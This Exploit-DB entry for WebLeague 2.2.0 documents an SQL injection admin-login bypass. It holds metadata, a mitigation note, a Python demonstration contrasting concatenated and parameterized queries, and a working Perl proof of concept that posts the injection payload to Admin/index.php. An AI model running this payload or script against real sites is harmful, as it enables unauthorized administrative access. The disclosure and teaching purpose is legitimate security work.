Vendor: WebLeague 2.2.0
By: ka0x
CVSS: 7,5 (HIGH)
Title: Remote Admin Bypass
CWE: 89
Product Name: WebLeague 2.2.0
Affected Version From: 2.2.0
Affected Version To: 2.2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
Date: 2009

WebLeague 2.2.0 Remote Admin Bypass p0c

This proof of concept targets an SQL injection (CWE-89) in WebLeague 2.2.0 that lets an attacker bypass authentication for the admin panel. Admin/index.php interpolates $_POST[username] and $_POST[password] directly into the SELECT statement that checks credentials, without escaping or parameterizing them, so quote and comment characters in those fields change the logic of the query. The script sends a single POST request to Admin/index.php with such values and checks whether the response contains the logged-in banner.

Mitigation:

The application should pass user-supplied values to the database through prepared statements with bound parameters (or, at minimum, escape them with the database driver's quoting function) instead of interpolating $_POST values into the SQL string.
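To make the bypass mechanism concrete, the following Python/sqlite3 script (added here; it is not part of ka0x's PoC nor of WebLeague) rebuilds the string concatenation from Admin/index.php line 10 against a constructed one-row admin table, runs the PoC's two field values through it, and contrasts the result with a parameterized query. The table name `admin` and its single row are assumptions.

```python
import sqlite3

# Constructed stand-in for WebLeague's admin table (assumption): exactly one
# admin row, which is what the original check `mysql_num_rows($result) == 1` expects.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (name TEXT, password TEXT)")
    db.execute("INSERT INTO admin VALUES ('admin', 'correct horse')")
    return db

def build_query(username, password):
    """Mirror of the interpolation at Admin/index.php line 10 (string building only)."""
    return ("SELECT * FROM admin WHERE name = '%s' AND password = '%s'"
            % (username, password))

def login_vulnerable(username, password):
    """Run the interpolated query; return the number of matching rows."""
    db = make_db()
    return len(db.execute(build_query(username, password)).fetchall())

def login_parameterized(username, password):
    """Hardened check: values are bound as parameters, never spliced into SQL text."""
    db = make_db()
    rows = db.execute("SELECT * FROM admin WHERE name = ? AND password = ?",
                      (username, password)).fetchall()
    return len(rows)

# Field values from the PoC on this page: the username closes its quote and opens a
# comment, the password closes the comment and appends an always-true condition, so
# the password comparison is commented out of the query entirely.
BYPASS_USER = "'/*"
BYPASS_PASS = "*/ or ''='"

if __name__ == "__main__":
    print(build_query(BYPASS_USER, BYPASS_PASS))
    print("vulnerable rows:   ", login_vulnerable(BYPASS_USER, BYPASS_PASS))
    print("parameterized rows:", login_parameterized(BYPASS_USER, BYPASS_PASS))
```

Running it prints the effective query `... WHERE name = ''/*' AND password = '*/ or ''=''`, which the database reads as `WHERE name = '' or ''=''` and matches the admin row, while the parameterized version matches nothing.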

Exploit-DB raw data:

#!/usr/bin/perl -W
#
# WebLeague 2.2.0 Remote Admin Bypass p0c
# written by ka0x <ka0x01[at]gmail.com>
#
# need magic_quotes_gpc = Off
#
# Vuln code (Admin/index.php) :
#
# 10:	$sql="SELECT * FROM $admintable WHERE name = '$_POST[username]' AND password = '$_POST[password]'"; // ---> NOT CLEAN $_POST VARS
# 11:	$result=mysql_query($sql,$db);
# 12:	$number = mysql_num_rows($result);
# 13:	if ($number == "1") {
#

use strict ;
use warnings ;
use LWP::UserAgent ;
use HTTP::Request ;

my $timeout = 10 ;

die "* USAGE: \tperl $0 <host>\n" unless $ARGV[0] ;

my $host = $ARGV[0] ;

$host = 'http://'.$host if( $host !~ /^http:/ ) ;
$host = $host.'/' unless( substr( $host, -1 ) eq '/' ) ;

my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;
$ua->timeout( $timeout ) ;

my $req = HTTP::Request->new( POST => $host.'Admin/index.php' );
$req->content_type( 'application/x-www-form-urlencoded' ) ;
$req->content( 'username=\'/*&password=*/ or \'\'=\'' ) ; 	# content $_POST vars: 
								# username=  '/*
								# password=   */ or ''='
my $res = $ua->request( $req ) ;

if( $res->content =~ /You are logged in as/i ){
	print "[+] The website is vulnerable." ;
} 
else {
	print "[-] The website isn't vulnerable." ;
}


__END__

# milw0rm.com [2009-07-16]